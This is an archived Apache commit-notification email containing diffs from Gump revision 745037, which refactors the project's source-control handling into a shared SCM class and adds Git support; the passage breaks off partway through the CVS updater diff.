Feb 2009 13:10:38 -0000 Received: (qmail 64928 invoked by uid 500); 17 Feb 2009 13:10:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 64919 invoked by uid 99); 17 Feb 2009 13:10:38 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Feb 2009 05:10:38 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Feb 2009 13:10:37 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 3CE102388B5E; Tue, 17 Feb 2009 13:10:17 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r745037 [2/2] - in /gump/live: cron/ python/gump/actor/document/xdocs/ python/gump/commands/ python/gump/core/model/ python/gump/core/run/ python/gump/core/runner/ python/gump/core/update/ python/gump/test/ python/gump/util/ python/misc/ sr... Date: Tue, 17 Feb 2009 13:10:15 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Modified: gump/live/src/documentation/content/xdocs/mail.xml URL: http://svn.apache.org/viewvc/gump/live/src/documentation/content/xdocs/mail.xml?rev=745037&r1=745036&r2=745037&view=diff ============================================================================== --- gump/live/src/documentation/content/xdocs/mail.xml (original) +++ gump/live/src/documentation/content/xdocs/mail.xml Tue Feb 17 13:10:13 2009 @@ -71,4 +71,4 @@ </section> </section> </body> -</document> \ No newline at end of file +</document> From [email protected] Tue Feb 17 13:10:44 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30175 invoked from network); 17 Feb 2009 13:10:44 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 17 Feb 2009 13:10:44 -0000 Received: (qmail 64983 invoked by uid 500); 17 Feb 2009 13:10:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 64974 invoked by uid 99); 17 Feb 2009 13:10:44 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Feb 2009 05:10:44 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Feb 2009 13:10:39 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 33D4723888A3; Tue, 17 Feb 2009 13:10:17 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r745037 [1/2] - in /gump/live: cron/ python/gump/actor/document/xdocs/ python/gump/commands/ python/gump/core/model/ python/gump/core/run/ python/gump/core/runner/ python/gump/core/update/ python/gump/test/ python/gump/util/ python/misc/ sr... Date: Tue, 17 Feb 2009 13:10:15 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Tue Feb 17 13:10:13 2009 New Revision: 745037 URL: http://svn.apache.org/viewvc?rev=745037&view=rev Log: Merge SCM refactoring and GIT support from trunk Added: gump/live/python/gump/core/update/git.py - copied, changed from r741429, gump/trunk/python/gump/core/update/git.py gump/live/python/gump/core/update/scmupdater.py - copied, changed from r744794, gump/trunk/python/gump/core/update/scmupdater.py Modified: gump/live/cron/gump.py (contents, props changed) gump/live/python/gump/actor/document/xdocs/documenter.py gump/live/python/gump/commands/__init__.py gump/live/python/gump/commands/build.py gump/live/python/gump/core/model/module.py gump/live/python/gump/core/model/repository.py gump/live/python/gump/core/run/gumpenv.py gump/live/python/gump/core/runner/__init__.py gump/live/python/gump/core/runner/demand.py gump/live/python/gump/core/update/__init__.py gump/live/python/gump/core/update/cvs.py gump/live/python/gump/core/update/p4.py gump/live/python/gump/core/update/svn.py gump/live/python/gump/core/update/updater.py gump/live/python/gump/test/model.py gump/live/python/gump/test/testExample.py gump/live/python/gump/util/sync.py gump/live/python/misc/pgrp.py (contents, props changed) gump/live/src/documentation/content/xdocs/bylaws.xml gump/live/src/documentation/content/xdocs/mail.xml Modified: gump/live/cron/gump.py URL: http://svn.apache.org/viewvc/gump/live/cron/gump.py?rev=745037&r1=745036&r2=745037&view=diff ============================================================================== Binary files - no diff available. Propchange: gump/live/cron/gump.py ------------------------------------------------------------------------------ svn:eol-style = native Propchange: gump/live/cron/gump.py ('svn:mime-type' removed) Modified: gump/live/python/gump/actor/document/xdocs/documenter.py URL: http://svn.apache.org/viewvc/gump/live/python/gump/actor/document/xdocs/documenter.py?rev=745037&r1=745036&r2=745037&view=diff ============================================================================== --- gump/live/python/gump/actor/document/xdocs/documenter.py (original) +++ gump/live/python/gump/actor/document/xdocs/documenter.py Tue Feb 17 13:10:13 2009 @@ -1645,31 +1645,38 @@ module, \ repoList.createEntry( "Repository: ") ) - if module.hasCvs(): - if module.cvs.hasModule(): - repoList.createEntry( "CVS Module: ", module.cvs.getModule()) + scm = module.getScm() + if scm: + scmName = scm.getScmName() + if scm.hasDir(): + repoList.createEntry(scmName + " Directory: ", scm.getDir()) + if scm.getScmType() == 'cvs': + if scm.hasModule(): + repoList.createEntry(scmName + " Module: ", + scm.getModule()) - if module.cvs.hasTag(): - repoList.createEntry( "CVS Tag: ", module.cvs.getTag()) - - if module.cvs.hasDir(): - repoList.createEntry( "CVS Dir: ", module.cvs.getDir()) - - if module.cvs.hasHostPrefix(): - repoList.createEntry( "CVS Host Prefix: ", module.cvs.getHostPrefix()) + if scm.hasTag(): + repoList.createEntry(scmName + " Tag: ", scm.getTag()) + + if scm.hasHostPrefix(): + repoList.createEntry(scmName + " Host Prefix: ", + scm.getHostPrefix()) - repoList.createEntry( "CVSROOT: ", module.cvs.getCvsRoot()) + repoList.createEntry("CVSROOT: ", scm.getCvsRoot()) + + elif scm.getScmType() == 'p4': + if scm.hasTag(): + repoList.createEntry(scmName + " Tag: ", scm.getTag()) + + repoList.createEntry(scmName + " Port: ", scm.getPort()) + repoList.createEntry(scmName + " Clientspec: ", + scm.getClientspec()) - if module.hasSvn(): - if module.svn.hasDir(): - repoList.createEntry( "SVN Directory: ", module.svn.getDir()) - repoList.createEntry( "SVN URL: ", module.svn.getRootUrl()) + repoList.createEntry(scmName + " URL: ", scm.getRootUrl()) - if module.hasArtifacts(): - if module.artifacts.hasUrl(): - repoList.createEntry( "Jars URL: ", module.artifacts.getUrl()) - repoList.createEntry('Redistributable: ', module.isRedistributable()) + repoList.createEntry('Redistributable: ', + module.isRedistributable()) document.serialize() document=None Modified: gump/live/python/gump/commands/__init__.py URL: http://svn.apache.org/viewvc/gump/live/python/gump/commands/__init__.py?rev=745037&r1=745036&r2=745037&view=diff ============================================================================== --- gump/live/python/gump/commands/__init__.py (original) +++ gump/live/python/gump/commands/__init__.py Tue Feb 17 13:10:13 2009 @@ -22,4 +22,4 @@ # tell Python what modules make up this package # NOTE: this is used by the command line processing routines so keep it up to date! -__all__ = ["env","build","check"] \ No newline at end of file +__all__ = ["env","build","check"] Modified: gump/live/python/gump/commands/build.py URL: http://svn.apache.org/viewvc/gump/live/python/gump/commands/build.py?rev=745037&r1=745036&r2=745037&view=diff ============================================================================== --- gump/live/python/gump/commands/build.py (original) +++ gump/live/python/gump/commands/build.py Tue Feb 17 13:10:13 2009 @@ -52,4 +52,4 @@ # Perform this integration run... return getRunner(run).perform() - \ No newline at end of file + Modified: gump/live/python/gump/core/model/module.py URL: http://svn.apache.org/viewvc/gump/live/python/gump/core/model/module.py?rev=745037&r1=745036&r2=745037&view=diff ============================================================================== --- gump/live/python/gump/core/model/module.py (original) +++ gump/live/python/gump/core/model/module.py Tue Feb 17 13:10:13 2009 @@ -32,17 +32,47 @@ from gump.util.note import transferAnnotations, Annotatable from gump.util.domutils import * -class ModuleCvs(ModelObject): +class ModuleScm(ModelObject): def __init__(self,dom,repository): ModelObject.__init__(self,dom) - self.repository=repository + # Reference to the shared repository + self.repository = repository + + # Extract settings + self.dir = self.getDomAttributeValue('dir') + self.type = self.element.tagName + + def getRootUrl(self): + url = self.repository.getUrl() + if url and self.hasDir(): + url += self.getDir() + return url + + def hasDir(self): + if self.dir: return True + return False + + def getDir(self): + return self.dir + + def getViewUrl(self): + return self.getRootUrl() + + def getScmType(self): + return self.type + + def getScmName(self): + return self.repository.getType() + +class ModuleCvs(ModuleScm): + def __init__(self,dom,repository): + ModuleScm.__init__(self, dom, repository) # Extract settings - self.tag = self.getDomAttributeValue('tag') - self.module = self.getDomAttributeValue('module') - self.hostPrefix = self.getDomAttributeValue('host-prefix') - self.dir = self.getDomAttributeValue('dir','') + self.tag = self.getDomAttributeValue('tag') + self.module = self.getDomAttributeValue('module') + self.hostPrefix = self.getDomAttributeValue('host-prefix') def getCvsRoot(self): """Construct the CVS root for this set of information""" @@ -82,13 +112,6 @@ def getHostPrefix(self): return str(self.hostPrefix) - def hasDir(self): - if self.dir: return True - return False - - def getDir(self): - return str(self.dir) - def hasModule(self): if self.module: return True return False @@ -105,38 +128,11 @@ url=self.repostory.getCvsWeb()+'/'+self.module.getName() return url -class ModuleSvn(ModelObject): - def __init__(self,dom,repository): - ModelObject.__init__(self,dom) - - # Reference to the shared repository - self.repository=repository - - # Extract settings - self.dir = self.getDomAttributeValue('dir') - - def getRootUrl(self): - url=self.repository.getUrl() - if self.hasDir(): - url+=self.getDir() - return url - - def hasDir(self): - if self.dir: return True - return False - - def getDir(self): - return self.dir - - def getViewUrl(self): - return self.getRootUrl() - -class ModuleP4(ModelObject): +class ModuleP4(ModuleScm): def __init__(self,dom,repository): - ModelObject.__init__(self,dom) + ModuleScm.__init__(self, dom, repository) # Reference to the shared repository - self.repository=repository self.hostname='perforce:1666' if repository.hasDomChild('root'): root=repository.getDomChild('root') @@ -149,9 +145,6 @@ self.tag=self.getDomAttributeValue('tag') - # Extract settings - self.dir=self.getDomAttributeValue('dir') - def getPort(self): return str(self.hostname) @@ -171,22 +164,6 @@ def getTag(self): return str(self.tag) - def getRootUrl(self): - url=self.repository.getUrl() - if self.hasDir(): - url+=self.getDir() - return url - - def hasDir(self): - if self.dir: return True - return False - - def getDir(self): - return self.dir - - def getViewUrl(self): - return self.getRootUrl() - class ModuleArtifacts(ModelObject): def __init__(self,dom,repository): ModelObject.__init__(self,dom) @@ -217,36 +194,33 @@ class Module(NamedModelObject, Statable, Resultable, Positioned): """Set of Modules (which contain projects)""" def __init__(self,name,dom,owner): - NamedModelObject.__init__(self,name,dom,owner) - - Statable.__init__(self) - Resultable.__init__(self) - Positioned.__init__(self) - - self.totalDepends=[] - self.totalDependees=[] + NamedModelObject.__init__(self,name,dom,owner) + + Statable.__init__(self) + Resultable.__init__(self) + Positioned.__init__(self) + + self.totalDepends=[] + self.totalDependees=[] - self.projects={} - + self.projects={} + self.notifys=[] - self.repository=None - self.cvs=None - self.svn=None - self.artifacts=None - self.p4=None - - self.packaged = False + self.repository=None + self.scm = None + + self.packaged = False self.redistributable= False # Changes were found (when updating) - self.modified = False - - # The task of updating has occured.. - self.updated = False - - self.affected = 0 - + self.modified = False + + # The task of updating has occured.. + self.updated = False + + self.affected = 0 + # Extract settings self.tag='' @@ -261,7 +235,7 @@ def getObjectForTag(self,tag,dom,name=None): """ - Get a new (or spliced) object for this tag + Get a new (or spliced) object for this tag """ object=None @@ -284,10 +258,10 @@ return object def resolve(self): - """ - Resolving requires creating objects (in the correct lists/maps) for - certain high level XML elements, e.g. <project. - """ + """ + Resolving requires creating objects (in the correct lists/maps) for + certain high level XML elements, e.g. <project. + """ if self.isResolved(): return @@ -406,9 +380,9 @@ `packageCount` + '.)') # Determine source directory - self.absWorkingDir= \ + self.absWorkingDir= \ os.path.abspath( - os.path.join(workspace.getBaseDirectory(), + os.path.join(workspace.getBaseDirectory(), self.workdir)) self.absSrcCtlDir= \ @@ -422,70 +396,8 @@ os.path.join( workspace.getSourceControlStagingDirectory(), self.getName() + '.lock')) - # :TODO: Consolidate this code, less cut-n-paste but also - # check the 'type' of the repository is appropriate for the - # use (eg. type='cvs' if referenced by CVS). if not packaged: - # We have a CVS entry, expand it... - if self.hasDomChild('cvs'): - cvs=self.getDomChild('cvs') - repoName=getDomAttributeValue(cvs,'repository') - if repoName: - if workspace.hasRepository(repoName): - # It references this repository... - repo=workspace.getRepository(repoName) - self.repository=repo - repo.addModule(self) - self.cvs=ModuleCvs(cvs,repo) - else: - self.changeState(STATE_FAILED,REASON_CONFIG_FAILED) - self.addError('No such repository ['+ str(repoName) +'] in workspace on [' \ - + self.getName() + ']') - - elif self.hasDomChild('svn'): - rdom=self.getDomChild('svn') - repoName=getDomAttributeValue(rdom,'repository') - if repoName: - if workspace.hasRepository(repoName): - # It references this repository... - repo=workspace.getRepository(repoName) - self.repository=repo - repo.addModule(self) - self.svn=ModuleSvn(rdom,repo) - else: - self.changeState(STATE_FAILED,REASON_CONFIG_FAILED) - self.addError('No such repository ['+ str(repoName) +'] in workspace on [' \ - + self.getName() + ']') - - elif self.hasDomChild('p4'): - p4dom=self.getDomChild('p4') - repoName=getDomAttributeValue(p4dom,'repository') - if repoName: - if workspace.hasRepository(repoName): - # It references this repository - repo=workspace.getRepository(repoName) - self.repository=repo - repo.addModule(self) - self.p4=ModuleP4(p4dom,repo) - else: - self.changeState(STATE_FAILED,REASON_CONFIG_FAILED) - self.addError('No such repository ['+ str(repoName) + '] in workspace on [' \ - + self.getName() + ']') - - elif self.hasDomChild('artifacts'): - adom=self.getDomChild('artifacts') - repoName=getDomAttributeValue(adom,'repository') - if repoName: - if workspace.hasRepository(repoName): - # It references this repository... - repo=workspace.getRepository(repoName) - self.repository=repo - repo.addModule(self) - self.artifacts=ModuleArtifacts(adom,repo) - else: - self.changeState(STATE_FAILED,REASON_CONFIG_FAILED) - self.addError('No such repository ['+ str(repoName) +'] in workspace on [' \ - + self.getName() + ']') + self.parseScm() # Grab all notifications for notifyEntry in self.getDomChildIterator('nag'): @@ -520,6 +432,44 @@ self.setComplete(True) + def parseScm(self): + """ + Parses the child element that holds SCM information + """ + + # sorted by priority, the first matching SCM element wins + supportedScms = ['cvs', 'svn', 'p4', 'git', 'artifacts'] + for s in supportedScms: + if self.hasDomChild(s): + dom = self.getDomChild(s) + repoName = getDomAttributeValue(dom, 'repository') + if repoName: + if self.workspace.hasRepository(repoName): + # It references this repository... + repo = self.workspace.getRepository(repoName) + self.repository = repo + repo.addModule(self) + self.scm = self.createScmInstance(s, dom, repo) + else: + self.changeState(STATE_FAILED,REASON_CONFIG_FAILED) + self.addError('No such repository ['+ str(repoName) \ + +'] in workspace on [' \ + + self.getName() + ']') + return + + + def createScmInstance(self, type, dom, repo): + """ + Factory method for matching ModuleScm subclass of given SCM + """ + if type == 'cvs': + return ModuleCvs(dom, repo) + elif type == 'p4': + return ModuleP4(dom, repo) + elif type == 'artifacts': + return ModuleArtifacts(dom, repo) + return ModuleScm(dom, repo) + def hasNotifys(self): if self.notifys: return True return False @@ -537,7 +487,7 @@ def addProject(self,project): """ - Associate this module with this project, and vice verse. + Associate this module with this project, and vice verse. """ name=project.getName() @@ -729,24 +679,9 @@ return 'http://svn.apache.org/repos/asf/gump/metadata/' + location def isUpdatable(self): - return self.hasCvs() or self.hasSvn() or self.hasArtifacts() - - def hasCvs(self): - if self.cvs: return True - return False - - def hasSvn(self): - if self.svn: return True + if self.scm: return True return False - - def hasP4(self): - if self.p4: return True - return False - - def hasArtifacts(self): - if self.artifacts: return True - return False - + # Where the contents (at the repository) Modified? def isModified(self): return self.modified @@ -768,12 +703,12 @@ return self.repository def getViewUrl(self): - if self.hasCvs(): - return self.cvs.getViewUrl() - elif self.hasSvn(): - return self.svn.getViewUrl() - elif self.hasP4(): - return self.p4.getViewUrl() + scm = getScm(self); + if scm: + return scm.getViewUrl() + + def getScm(self): + return self.scm class ModuleStatistics(Statistics): """ Modified: gump/live/python/gump/core/model/repository.py URL: http://svn.apache.org/viewvc/gump/live/python/gump/core/model/repository.py?rev=745037&r1=745036&r2=745037&view=diff ============================================================================== --- gump/live/python/gump/core/model/repository.py (original) +++ gump/live/python/gump/core/model/repository.py Tue Feb 17 13:10:13 2009 @@ -30,7 +30,7 @@ class Repository(NamedModelObject, Statable): """ - A named repository (CVS|SVN|Artifacts) + A named repository (CVS|SVN|Perforce|Artifacts|GIT) """ def __init__(self,name,dom,workspace): @@ -38,10 +38,17 @@ self.url=None + typeToLabel = {'cvs':'CVS', 'svn':'Subversion', 'artifact':'Artifact', + 'p4':'Perforce', 'git':'Git'} + type=self.getDomAttributeValue('type') + try: + self.type = typeToLabel[type] + except: + raise RuntimeError, 'Invalid Repository Type:' + str(xml.type) + if 'cvs'==type: - self.type='CVS' self.web=self.getDomChildValue('cvsweb') or \ self.getDomChildValue('web') if self.hasDomChild('root'): @@ -52,33 +59,25 @@ self.path=getDomChildValue(root,'path') self.hostname=getDomChildValue(root,'hostname') else: - raise RuntimeError, 'No XML <root on repository: ' + self.getName() - elif 'svn'==type: - self.type='Subversion' - if self.hasDomChild('url'): - self.url=self.getDomChildValue('url') - else: - raise RuntimeError, 'No URL on SVN repository: ' + self.getName() - self.web=self.getDomChildValue('web') - self.user=self.getDomChildValue('user') - self.password=self.getDomChildValue('password') - elif 'artifact'==type: - self.type='Artifacts' - if self.hasDomChild('url'): - self.url=self.getDomChildValue('url') - else: - raise RuntimeError, 'No URL on Jars repository: ' + self.getName() - self.web=self.getDomChildValue('web') + raise RuntimeError, 'No XML <root on repository: ' \ + + self.getName() elif 'p4'==type: - self.type='Perforce' if self.hasDomChild('root'): root=self.getDomChild('root') self.p4port=getDomChildValue(root,'hostname') else: - raise RuntimeError, 'No Perforce server on P4 repository: ' + self.getName() + raise RuntimeError, 'No Perforce server on P4 repository: ' \ + + self.getName() self.web=self.getDomChildValue('web') else: - raise RuntimeError, 'Invalid Repository Type:' + str(xml.type) + if self.hasDomChild('url'): + self.url=self.getDomChildValue('url') + else: + raise RuntimeError, 'No URL on ' + self.type + ' repository: ' \ + + self.getName() + self.web=self.getDomChildValue('web') + self.user=self.getDomChildValue('user') + self.password=self.getDomChildValue('password') # Modules referencing this repository self.modules=[] Modified: gump/live/python/gump/core/run/gumpenv.py URL: http://svn.apache.org/viewvc/gump/live/python/gump/core/run/gumpenv.py?rev=745037&r1=745036&r2=745037&view=diff ============================================================================== --- gump/live/python/gump/core/run/gumpenv.py (original) +++ gump/live/python/gump/core/run/gumpenv.py Tue Feb 17 13:10:13 2009 @@ -82,6 +82,10 @@ self.noJavac = False self.noMake = False self.noMvnRepoProxy = False + self.noGit = False + self.noDarcs = False + self.noHg = False + self.noBzr = False self.javaProperties = None @@ -157,43 +161,42 @@ if not self.noJavac and not self._checkExecutable('java com.sun.tools.javac.Main','-help',False,False,'check_java_compiler'): self.noJavac=True - if not self.noCvs and not self._checkExecutable('cvs','--version',False): - self.noCvs=True - self.addWarning('"cvs" command not found, no CVS repository updates') - - if not self.noSvn and not self._checkExecutable('svn','--version',False): - self.noSvn=True - self.addWarning('"svn" command not found, no SVN repository updates') + self.noCvs = self._checkWithDashVersion('cvs', + 'no CVS repository updates') + + self.noSvn = self._checkWithDashVersion('svn', + 'no svn repository updates') - if not self.noP4 and not self._checkExecutable('p4','-V',False): - self.noP4=True - self.addWarning('"p4" command not found, no Perforce repository updates') + self.noP4 = self._checkWithDashVersion('p4', + 'no Perforce repository updates', + '-V') - if not self.noMaven and \ - not self._checkExecutable('maven','--version',False,False,'check_maven'): - self.noMaven=True - self.addWarning('"maven" command not found, no Maven builds') - - if not self.noMaven2 and \ - not self._checkExecutable('mvn','--version',False,False,'check_maven2'): - self.noMaven=True - self.addWarning('"mvn" command not found, no Maven2 builds') - - if not self.noNAnt and \ - not self._checkExecutable('NAnt','-help',False,False,'check_NAnt'): - self.noNAnt=True - self.addWarning('"NAnt" command not found, no NAnt builds') - - if not self.noMono and \ - not self._checkExecutable('mono','--help',False,False,'check_mono'): - self.noMono=True - self.addWarning('"Mono" command not found, no Mono runtime') + self.noMaven = not self.noMaven and not \ + self._checkWithDashVersion('maven', "no Maven 1.x builds") + - if not self.noMake and \ - not self._checkExecutable('make','--help',False,False,'check_Make'): - self.noMake=True - self.addWarning('"make" command not found, no make builds') + self.noMaven2 = not self.noMaven2 and not \ + self._checkWithDashVersion('mvn', "no Maven 2.x builds") + + self.noNAnt = self._checkWithDashVersion('NAnt', "no NAnt builds") + + self.noMono = self._checkWithDashVersion('mono', "no Mono runtime") + + self.noMake = self._checkWithDashVersion('make', "no make builds") + self.noGit = self._checkWithDashVersion('git', + 'no git repository updates') + + self.noDarcs = self._checkWithDashVersion('darcs', + 'no darcs repository updates') + + self.noHg = self._checkWithDashVersion('hg', + 'no Mercurial repository updates') + + self.noBzr = self._checkWithDashVersion('bzr', + 'no Bazar repository updates') + + self.checked = True self.changeState(STATE_SUCCESS) @@ -270,6 +273,18 @@ return self.javaProperties + def _checkWithDashVersion(self,commandName,consequence,version='--version'): + """ + Determine whether a particular command is or is not available + by using the --version switch + """ + ok = self._checkExecutable(commandName, version, False, False, + 'check_' + commandName) + if not ok: + self.addWarning('"' + commandName + '" command not found, ' + + consequence) + return ok + def _checkExecutable(self,command,options,mandatory,logOutput=False,name=None): """ Determine whether a particular command is or is not available. Modified: gump/live/python/gump/core/runner/__init__.py URL: http://svn.apache.org/viewvc/gump/live/python/gump/core/runner/__init__.py?rev=745037&r1=745036&r2=745037&view=diff ============================================================================== --- gump/live/python/gump/core/runner/__init__.py (original) +++ gump/live/python/gump/core/runner/__init__.py Tue Feb 17 13:10:13 2009 @@ -26,4 +26,4 @@ behaviour like multithreading and/or which actors are run. Which runner to use is determined using the gump.runner.getRunner() method. -""" \ No newline at end of file +""" Modified: gump/live/python/gump/core/runner/demand.py URL: http://svn.apache.org/viewvc/gump/live/python/gump/core/runner/demand.py?rev=745037&r1=745036&r2=745037&view=diff ============================================================================== --- gump/live/python/gump/core/runner/demand.py (original) +++ gump/live/python/gump/core/runner/demand.py Tue Feb 17 13:10:13 2009 @@ -76,7 +76,7 @@ def performUpdate(self,module): """ - Perform the (cvs,svn) update of a single module. + Perform the SCM update of a single module. The module is locked during the update. Most of the actual work is delegated to the updater that's provided by the parent GumpRunner Modified: gump/live/python/gump/core/update/__init__.py URL: http://svn.apache.org/viewvc/gump/live/python/gump/core/update/__init__.py?rev=745037&r1=745036&r2=745037&view=diff ============================================================================== --- gump/live/python/gump/core/update/__init__.py (original) +++ gump/live/python/gump/core/update/__init__.py Tue Feb 17 13:10:13 2009 @@ -17,6 +17,6 @@ # limitations under the License. # tell Python what modules make up the gump.test package -__all__ = ["updater","cvs","svn","jars"] +__all__ = ["updater","cvs","svn","jars", "git", "scmupdater"] Modified: gump/live/python/gump/core/update/cvs.py URL: http://svn.apache.org/viewvc/gump/live/python/gump/core/update/cvs.py?rev=745037&r1=745036&r2=745037&view=diff ============================================================================== --- gump/live/python/gump/core/update/cvs.py (original) +++ gump/live/python/gump/core/update/cvs.py Tue Feb 17 13:10:13 2009 @@ -15,228 +15,97 @@ # See the License for the specific language governing permissions and # limitations under the License. -""" - -""" - -import os.path -import sys -from fnmatch import fnmatch - -from gump import log -from gump.core.run.gumprun import * -from gump.core.config import dir, default, basicConfig - -from gump.util import dump, display, getIndent, logResourceUtilization, \ - invokeGarbageCollection -from gump.util.note import Annotatable -from gump.util.work import * - -from gump.util.tools import * - -from gump.core.model.workspace import * -from gump.core.model.module import Module -from gump.core.model.project import Project -from gump.core.model.depend import ProjectDependency -from gump.core.model.stats import * -from gump.core.model.state import * - -from gump.tool.integration.cvs import * - +from gump.core.model.workspace import Cmd +from gump.core.update.scmupdater import ScmUpdater +from gump.tool.integration.cvs import readLogins, loginToRepositoryOnDemand + +def maybe_add_tag(module, cmd): + # Determine if a tag is set, on <cvs or on <module + tag = None + if module.getScm().hasTag(): + tag = module.getScm().getTag() + elif module.hasTag(): + tag = module.getTag() + if tag: + cmd.addParameter('-r', tag, ' ') ############################################################################### # Classes ############################################################################### -class CvsUpdater(RunSpecific): +class CvsUpdater(ScmUpdater): + """ + Updater for CVS + """ - def __init__(self,run): - RunSpecific.__init__(self,run) + def __init__(self, run): + ScmUpdater.__init__(self, run) # # A stash of known logins. # - self.logins=readLogins() + self.logins = readLogins() - def updateModule(self,module): + def getCheckoutCommand(self, module): """ - - Perform a CVS update on a module - + Build the appropriate CVS command for checkout """ - - #log.info('Perform CVS Update on #[' + `module.getPosition()` + \ - # '] : ' + module.getName()) + self.maybeLogin(module) - # Did we 'CVS checkout' already? - exists = os.path.exists(module.getSourceControlStagingDirectory()) - - # Doesn't tell us much... - #if exists: - # self.performStatus(module) - - self.performUpdate(module,exists) - - return module.okToPerformWork() - - def performStatus(self,module): - # Get the Update Command - (repository, root, cmd ) = self.getUpdateCommand(module, True, True) - - # Provide CVS logins, if not already there - loginToRepositoryOnDemand(repository,root,self.logins) - - # Execute the command and capture results - cmdResult=execute(cmd, module.getWorkspace().tmpdir) - - # - # Store this as work, on both the module and (cloned) on the repo - # - work=CommandWorkItem(WORK_TYPE_UPDATE,cmd,cmdResult) - module.performedWork(work) - - if not cmdResult.isOk(): - log.error('Failed to checkout/update module: ' + module.name) - - def performUpdate(self,module,exists): - """ - Update this module (checking out if needed) - """ - # Get the Update Command - (repository, root, cmd ) = self.getUpdateCommand(module, exists) - - #log.debug("CVS Update Module " + module.getName() + \ - # ", Repository Name: " + str(module.repository.getName())) - - # Provide CVS logins, if not already there - loginToRepositoryOnDemand(repository,root,self.logins) - - # Execute the command and capture results - cmdResult=execute(cmd, module.getWorkspace().tmpdir) - - # - # Store this as work, on both the module and (cloned) on the repo - # - work=CommandWorkItem(WORK_TYPE_UPDATE,cmd,cmdResult) - module.performedWork(work) - repository.performedWork(work.clone()) - - # Update Context w/ Results - if not cmdResult.isOk(): - log.error('Failed w/ CVS Root ' + root + ' for %s on Repository %s.' \ - % (module.name, module.repository.getName())) - if not exists: - module.changeState(STATE_FAILED,REASON_UPDATE_FAILED) - else: - module.addError('*** Failed to update from source control. Stale contents ***') - - # Black mark for this repository - repository=module.getRepository() - repository.addError('*** Failed to update %s from source control. Stale contents ***' \ - % module.getName()) - - # Kinda bogus, but better than nowt (for now) - module.changeState(STATE_SUCCESS,REASON_UPDATE_FAILED) + cmd = Cmd('cvs', 'update_' + module.getName(), + module.getWorkspace().getSourceControlStagingDirectory()) + self.setupCommonParameters(module, cmd) + + # do a cvs checkout + cmd.addParameter('checkout') + cmd.addParameter('-P') + maybe_add_tag(module, cmd) + + if not module.getScm().hasModule() or \ + not module.getScm().getModule() == module.getName(): + cmd.addParameter('-d', module.getName(), ' ') + + if module.getScm().hasModule(): + cmd.addParameter(module.getScm().getModule()) else: - module.changeState(STATE_SUCCESS) - - # We run CVS as -q (quiet) so any output means - # updates occured... - if cmdResult.hasOutput(): - log.info('Update(s) received via CVS on #[' \ - + `module.getPosition()` + \ - '] : ' + module.getName()) - - def preview(self,module): - - (repository, root, command ) = self.getUpdateCommand(module,False) - command.dump() - - # Doesn't tell us much... - #(repository, root, command ) = self.getUpdateCommand(module,True,True) - #command.dump() - - (repository, root, command ) = self.getUpdateCommand(module,True) - command.dump() - - - def getUpdateCommand(self,module,exists=False,nowork=False): - """ - Format a commandline for doing the CVS update + cmd.addParameter(module.getName()) + + return cmd + + def getUpdateCommand(self, module): + """ + Build the appropriate CVS command for update """ - - if nowork and not exists: - raise RuntimeException('Not coded for this combo.') - - root=module.cvs.getCvsRoot() + + self.maybeLogin(module) - # Prepare CVS checkout/update command... - prefix='update' - directory=module.getWorkspace().getSourceControlStagingDirectory() - if exists: - directory=module.getSourceControlStagingDirectory() - if nowork: - prefix='status' - - cmd=Cmd( 'cvs', - prefix+'_'+module.getName(), - directory) + cmd = Cmd('cvs', 'update_' + module.getName(), + module.getSourceControlStagingDirectory()) + self.setupCommonParameters(module, cmd) - # Be 'quiet' (but not silent) unless requested otherwise. - if not module.isDebug() \ - and not module.isVerbose() \ - and not module.cvs.isDebug() \ - and not module.cvs.isVerbose(): + # Do a cvs update + cmd.addParameter('update') + cmd.addParameter('-P') + cmd.addParameter('-d') + maybe_add_tag(module, cmd) + + return cmd + + def setupCommonParameters(self, module, cmd): + if self.shouldBeQuiet(module): cmd.addParameter('-q') - - if nowork: - cmd.addParameter('-n') - - # Allow trace for debug - if module.isDebug(): + elif module.isDebug(): cmd.addParameter('-t') - # Request compression cmd.addParameter('-z3') # Set the CVS root - cmd.addParameter('-d', root) - - # Determine if a tag is set, on <cvs or on <module - tag=None - if module.cvs.hasTag(): - tag=module.cvs.getTag() - elif module.hasTag(): - tag=module.getTag() - - if exists: - - # Do a cvs update - cmd.addParameter('update') - cmd.addParameter('-P') - cmd.addParameter('-d') - if tag: - cmd.addParameter('-r',tag,' ') - else: - cmd.addParameter('-A') - #cmd.addParameter(module.getName()) + cmd.addParameter('-d', module.getScm().getCvsRoot()) - else: + def maybeLogin(self, module): + 